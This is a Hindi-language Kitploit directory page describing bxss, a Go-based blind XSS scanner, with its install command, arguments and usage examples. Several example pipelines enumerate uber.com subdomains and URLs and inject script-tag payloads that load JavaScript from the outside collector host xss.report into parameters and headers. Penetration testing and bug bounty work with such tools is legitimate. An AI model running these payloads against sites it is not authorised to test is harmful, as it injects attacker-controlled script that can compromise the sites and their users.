Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
bxss — ब्लाइंड XSS स्कैनर एक उपकरण है जिसका उपयोग वेब एप्लिकेशन में ब्लाइंड XSS कमजोरियों को स्कैन करने के लिए किया जा सकता है। | Kitploit
उपकरण/GitHubGitHub/ethicalhackingplayground/bxss
भेद्यता स्कैनरवेब भेद्यता स्कैनरजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubethicalhackingplayground/bxss

bxss

ब्लाइंड XSS स्कैनर एक उपकरण है जिसका उपयोग वेब एप्लिकेशन में ब्लाइंड XSS कमजोरियों को स्कैन करने के लिए किया जा सकता है।

रिपॉजिटरी देखें
418551 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें


Bxss
Bxss - ब्लाइंड XSS स्कैनर

Version License Go Report Card Go Reference


🚀 विवरण

Bxss एक उच्च-प्रदर्शन ब्लाइंड XSS स्कैनर है जो वेब अनुप्रयोगों में ब्लाइंड XSS कमजोरियों का स्वचालित पता लगाता है।


✨ विशेषताएँ

  • ब्लाइंड XSS पेलोड को कस्टम हेडर और पैरामीटर में इंजेक्ट करता है
  • एकाधिक HTTP विधियों (PUT, POST, GET, OPTIONS) का समर्थन करता है
  • समवर्ती समर्थन के साथ उच्च-गति स्कैनिंग
  • अन्य टूल्स के साथ आसानी से चेन किया जा सकता है
  • सरल स्थापना और उपयोग

🧠 प्रगति पर है

हम सक्रिय रूप से क्रोमियम-आधारित वर्कर पूल को एकीकृत करने पर काम कर रहे हैं ताकि bxss के प्रदर्शन को कम-अंत उपकरणों पर बेहतर बनाया जा सके।

यह सुविधा संसाधन-गहन कार्यों, जैसे DOM-आधारित XSS का पता लगाना या ट्रिगर के बाद पेलोड निरीक्षण, को एक पूल के माध्यम से प्रबंधित हल्के क्रोमियम इंस्टेंस पर ऑफलोड करने की अनुमति देगी। कई हेडलेस ब्राउज़र संदर्भों में वर्कलोड को नियंत्रित और कुशल तरीके से वितरित करके, bxss कम-स्पेक मशीनों पर भी प्रतिक्रियाशील और उपयोग करने योग्य रहेगा।

यह bxss को न केवल शक्तिशाली बनाएगा बल्कि सिस्टम की बाधाओं के बावजूद अत्यधिक सुलभ भी बनाएगा।


✅ TODOs

  • DOM इंटरेक्शन और दृश्य सत्यापन के लिए क्रोमियम-आधारित वर्कर पूल
  • वैकल्पिक HTML/JSON रिपोर्टिंग आउटपुट
  • मल्टी-प्लेटफ़ॉर्म पेलोड अनुकूलन (XSS Hunter, Interactsh, आदि) का समर्थन
  • प्रॉक्सी समर्थन
  • कस्टम अनुरोध आयात करना

🧪 प्रायोगिक विशेषताएँ

  • ट्रेस मोड (प्रायोगिक)

📦 स्थापना

root@kitploit:~
go install -v github.com/ethicalhackingplayground/bxss/v2/cmd/bxss@latest

⚙️ आर्गुमेंट्स


🎬 प्रदर्शन

Demo


📝 ट्रेस मोड क्या है?

ट्रेस मोड एक प्रायोगिक सुविधा है जो आपको ट्रैक करने की अनुमति देती है कि ब्लाइंड XSS कहाँ ट्रिगर हुआ। कुछ तृतीय-पक्ष ब्लाइंड XSS प्लेटफ़ॉर्म जैसे https://xss.report/ आपको अपने पेलोड में कस्टम पैरामीटर निर्दिष्ट करने की अनुमति देते हैं, जिससे आप ट्रैक कर सकते हैं कि ब्लाइंड XSS कहाँ ट्रिगर हुआ। उदाहरण के लिए, यदि आप अपने पेलोड में url=https://somehost.com पैरामीटर निर्दिष्ट करते हैं, तो टूल पेलोड का उपयोग करेगा

root@kitploit:~
'"><script src=https://xss.report/c/username?url=https://somehost.com></script>'

परीक्षण के लिए और ट्रिगर होने पर आप DOM का निरीक्षण कर सकेंगे और देख सकेंगे कि ब्लाइंड XSS किस होस्ट से ट्रिगर हुआ।

Xss Report

सुनिश्चित करें कि अपने डैशबोर्ड में कस्टम पैरामीटर असाइन करते समय आप url={LINK} असाइन करें ताकि bxss स्वचालित रूप से {LINK} को वास्तविक URL से बदल सके।

🔥 उपयोग उदाहरण

पैरामीटर

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-t

पैरामीटर में जोड़ें

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-t

हेडर और पैरामीटर दोनों

root@kitploit:~
subfinder -d uber.com \
| gau \
| grep "&" \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

X-Forwarded-For हेडर

root@kitploit:~
subfinder -d uber.com \
| gau \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "X-Forwarded-For"

कस्टम हेडर और पैरामीटर

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \
-t

Dorki के साथ Google Dorks

root@kitploit:~
curl -X GET -H "Authorization: Bearer <Token>" \
-H "X-Secret-Key: <Secret>" \
https://dorki.attaxa.com/api/search?q=site:example.com -s \
| jq -r .[][].url \
| grep "&" \
| bxss -a -p '><script src=https://xss.report/c/username></script>'

दर सीमा के साथ कस्टम हेडर और पैरामीटर

root@kitploit:~
echo uber.com \
| haktrails subdomains \
| httpx \
| hakrawler -u \
| bxss -a -p '><script src=https://xss.report/c/username></script>' \
-H "User-Agent" \ 
-t \
-rl 10

उन्नत डॉर्किंग और भेद्यता अन्वेषण के लिए, Dorki देखें और आज ही साइन अप करें!


☕ परियोजना का समर्थन करें

यदि आप इस टूल का उपयोग करके कोई बाउंटी प्राप्त करते हैं, तो मुझे एक कॉफी खरीदकर समर्थन करने पर विचार करें!

Buy Me A Coffee

टूल डाउनलोड करें
आर्गुमेंटविवरणडिफ़ॉल्ट
-aपैरामीटर में पेलोड जोड़ेंfalse
-c intसमवर्ती स्तर सेट करें30
-H stringकस्टम हेडर सेट करें""
-hf stringहेडर वाली फ़ाइल का पथ""
-p stringब्लाइंड XSS पेलोड""
-pf stringपेलोड वाली फ़ाइल का पथ""
-tब्लाइंड XSS के लिए पैरामीटर का परीक्षण करेंfalse
-X stringउपयोग करने के लिए HTTP विधि""
-vडीबग मोड सक्षम करेंfalse
-rl floatदर सीमा (प्रति सेकंड अनुरोध)0
-fरीडायरेक्ट का पालन करेंfalse
-lट्रेस मोड सक्षम करें (प्रायोगिक)false